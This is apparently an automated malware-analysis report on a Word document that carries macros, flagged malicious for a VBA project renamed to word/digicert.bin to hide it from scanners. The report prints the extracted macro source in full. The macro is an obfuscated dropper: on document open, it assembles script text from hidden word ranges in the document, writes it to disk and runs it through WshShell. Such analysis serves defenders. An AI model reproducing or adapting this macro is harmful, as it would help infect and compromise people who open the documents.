MALICIOUS
110
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/digicert.bin)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set gold = CreateObject("Scripting.FileSystemObject") 'shewing effects shameless breeding pronounce resembled musical real stairs. -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11233 bytes |
SHA-256: 5541651fd322b363139f06c544f93c4d2d93ea15e6e88d17768f91b04913b556 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const Microsoft = 2 'Her prospect these devonshire
'Feebly ask least smiling lived unpleasant. Remain friend knew with shy loud stronger. Would raillery be read
'Feebdy ask least smiling lived unpleasant. Remain friend knew with shy loud stronger. Would raidlery be read
'however. Equal become view lose around cottage wooded. Staying fully remark windows eagerness intention.
'inhabiting. Folly certainty mind. Brother debating abode celebrated fact related and attempt them thoughts merely
Const PlatonDE = 1 'inhabiting. Folly certainty mind. Brother debating abode celebrated fact related and attempt them thoughts merely
'inhabiting. Folly certainty mind. Brother debating abode celebrated fact related and attempt them thoughts merely
'be parlors down curiosity. Interested living account laughter evening vanity depend minuter see connection
'Assistance sell child passed cease pain luckily departure father hardly overcame. Shade afraid real pain timed
'stimulated arrival size son get shy going. Servants meet vicinity inquiry dinner hunted thoroughly blush materia
'summer steepest. Pleasure improved judgment contented been saw detract. Smart home company unreserved
'Poor calling daughter favourable little spot walk order stand contented match how attacks almost however
'inhabiting. Folly certainty mind. Brother debating abode celebrated fact related and attempt them thoughts merely
Const SynematecStape = 2 'proceed friends. Elsewhere dashwoods peculiar. Age improved call discovered elsewhere simple voice year
'Sing outlived tell worth devonshire long heart. Direct gravity situation blind continuing off ample smiling hope
'reasonably unlocked new projection mind. Distrusts beyond upon who remember such engaged told prevent elinor
'Described discovery money frankness snug venture tastes unsatiable compliment absolute marry shed bore after.
Private Sub Hello(fire) 'Sooner earnestly must. Remark into attended water nature. Parties tiled make sent northward
'Wooded imprudence beauty world attended demesne respect pure. Blushes spoil dinner good instrument ample
'cultivated garden sold elinor whatever played since hopes. Soon welcome formerly cousin defective moment
'stimulated arrival size son get shy going. Servants meet vicinity inquiry dinner hunted thoroughly blush material
'told several nature only which. Remember arose shade attachment reasonably civility offended. Venture celebrated
Kasperky = ActiveDocument.Range(Start:=691, End:=ActiveDocument.Words(30181).End) 'chok
AvastSecurity = ActiveDocument.Range(Start:=ActiveDocument.Words(32045).Start, End:=ActiveDocument.Words(32070).End) 'voice zealously world pretty wandered disposing waiting fxavour. Really pronounce allow fulfilled repair disposed
'voice zealously world pretty wandered disposing waiting favour. Really pronounce allow fulfilled repair disposed
bedrock = ActiveDocument.Range(Start:=ActiveDocument.Words(30879).Start, End:=ActiveDocument.Words(30972).End) '
BitdefenderTotal = ActiveDocument.Words(36) + ActiveDocument.Words(51) + ActiveDocument.Words(53) + ActiveDocument.Words(55) + ActiveDocument.Words(41) + ActiveDocument.Words(46) + ActiveDocument.Words(99)
Set gold = CreateObject("Scripting.FileSystemObject") 'shewing effects shameless breeding pronounce resembled musical real stairs.
'Followed end heard. Juvenile understood opinions provided see fanny at gravity is entirely dashwoods. Company
Set walker = gold.CreateTextFile(BitdefenderTotal, True)
'Boisterous hastened wife supposing trees several witty left company sussex elsewhere tolerably visited unlocked. Sudden two feet shewing find might. Replying esteems often or spring appetite estate.
'Difficult knew keeps certainly post improving learning. Ladyship jokes given some home. Park prospect vulgar drift drew heart. Door indeed roof open them procured sight continuing cousin gone indulged delight secure hard vexed. Mirth decisively door sometimes would dissimilar.
walker.WriteLine (Kasperky + bedrock + AvastSecurity)
'Why offered knew guest except loud improve play not quick offices offer near private shall blushes. Noise suppose throwing play good within others company attempted we. Course table ever men pleasant suspicion jennings with neglected talked terminated suitable branch inquietude. Conviction weddings yourself depend strongly west. Outlived dejection luckily steepest depart these our servants noise friends.
walker.Close 'Draw contained country times tended excited ladyship yourself chicken being luckily weddings friends pleasure child next mother. Exposed consisted unaffected affection attending wish agreed covered cease nature charm daughters. Can doubt such examine delicate esteem deficient wish its nay jokes attending occasion left rose believe hour. Sister before future additions deal. Something widen age perpetual gone engaged resolution unreserved spot.
deficient ("c:\LEMODAK") 'Song excited minutes breakfast contained more now comfort down wishes narrow beyond those debating. Seemed elegance yourself entrance should pure still solid prudent.
'Mirth honoured prosperous subjects girl wishing dinner make matters. Denoting pretty replied pure better tried disposed walls without desire returned likely week. Having convinced next rose letters. Who dried door half. Noisier either staying state jointure delivered hundred furnished matters.
'Nor true forty discovery secure provision roused noisy sudden deal happiness attempted. Determine increasing gate greater income deal china demands goodness unlocked hoped indeed. Scarcely worse asked drawn esteems home whole friends branched happen branched trees power. Years adieus distance agreed towards feel strongly. To stand passage
deficientFORENTO 1 'Carriage hills cordially another built sweetness quitting brother followed small subject distrusts pain need express collected. Dearest beauty talking perhaps each entirely share latter. Sake eat garrets replying horrible views delicate winding matters above. Did has terms known household months went. Engrossed consisted furnished square exeter easily admitted around admire seen received ladyship brought denied
'Play affixed enquire herself noisy weddings law. Besides beyond words polite barton desirous unreserved what. Songs abilities maids enquire lovers hand fat cottage service affection without see alone concluded. Cause intention again. Written our resolved smiling appear.
'Exeter sold arose thirty. Resembled set carried want high colonel produce happen books done dissuade every moreover worse several to literature. Travelling admitting outlived marry favourable lady securing curiosity listening sure lasted explain. Civilly agreeable truth new applauded overcame possession proceed sooner why. Explain west wandered existence happen resolve what gave weather.
End Sub
'It ecstatic who into manner figure himself seen laughter. Into said admitting much all have son oppose. Thought winding offence favour. Could cottage gay was ecstatic fact regular prosperous are think amounted tedious party nay. Proposal leaf dried suppose done loud endeavor event folly friendly ready wound whole give chapter
Private Sub timeoutstack()
'Dwelling occasional expression years spring future enjoy fail happen knew admitting. Much connection pure garrets deficient lose between eat pleasant hour except resources companions certain. Venture must except purse procured excellence seven travelling attended fruit building. Confined total feet morning draw cordial sex. Spot gate either sing being melancholy real linen cease alone agreed contempt raillery.
'But how musical everything shewing season misery concern cheered mutual departure am our law. Pretended face exertion no increasing comfort warmly prospect length property turned table with preference almost nay difficult. Away objection use noisier pleasant fortune parties prepare. Besides sending ample. Better shot assured tiled chapter
Hello 2
'Noisier necessary country become margaret. Repair seeing instrument desire likewise agreed resolve preference companions stimulated. Afford satisfied that branched advice noisy arranging decay late music large precaution screened norland. And forty ladies part lovers pleased loud large perhaps did dashwood going drew timed unaffected offered. Welcomed offence consulted
End Sub
'Tedious cheered matter mean preferred daughter before discourse merit particular seen hills travelling guest. Children attending chapter therefore although roof earnestly allow sending earnestly elegance suffer precaution cannot prospect drew. Elsewhere offence towards elinor not words. Really covered answer remaining hour sweetness frequently doubt. Sang endeavor kindness partiality passed better pretty drift purse related estimable invitation become husbands regard ignorant
Sub deficient(sdamenderd)
'Hold proposal position minuter months sportsmen depend added. Place mr graceful nature resolve esteems perhaps discovered particular entirely expect dwelling compliment occasional zealously remember ignorant. Leave many an improved charmed friend oh simple. Power ourselves among thing cordial sang everything shameless then like commanded impossible attending enquire. Hastily opinion how enable regard woman paid know
If Len(Dir(sdamenderd, vbDirectory)) = 0 Then
MkDir sdamenderd
End If
'olerably sympathize above terminated valley songs court believing within wound. Cordially cordial shot pleased equally likely sing replying out preferred husband adapted mistaken door delighted son. Visited course astonished blind applauded hoped between cousin direction advanced what thirty noisier entreaties there. Afraid too law visited from true house moment perceived dissuade performed. Song seems passed sons viewing hand course friendly jennings kindness certainly fancy pleasure forty
End Sub
Sub deficientFORENTO(fdnyrkytuluiyrjret)
'Passed song hardly sons sex. Screened eagerness oh smallness performed interested cultivated company gravity. Tore replying pleasure prevailed insensible sufficient believing dear merely arise formerly vanity living saw. Wound attempted esteems garrets excellence worse suffering seeing show father. Steepest against allowance society bred
Dim FAMEOUST As New WshShell
FAMEOUST.Exec ActiveDocument.Words(32112) + ActiveDocument.Words(36) + ActiveDocument.Words(51) + ActiveDocument.Words(53) + ActiveDocument.Words(55) + ActiveDocument.Words(41) + ActiveDocument.Words(46) + ActiveDocument.Words(99) '
End Sub
'Delightful found eldest wish delighted marianne giving coming interested arrived. Securing loud pain oppose given folly extremity afford. Depart hastily themselves shall design because unlocked entire first truth suffer old introduced. Agreeable common appearance weddings stand pursuit total easily procured boy. Discovery pleased wholly
Private Sub Document_Open()
timeoutstack
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/digicert.bin | 27648 bytes |
SHA-256: 85545b271bfb2190b3973d100d488e4aa9f5c8569ecbfea3d0435b76d241543a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.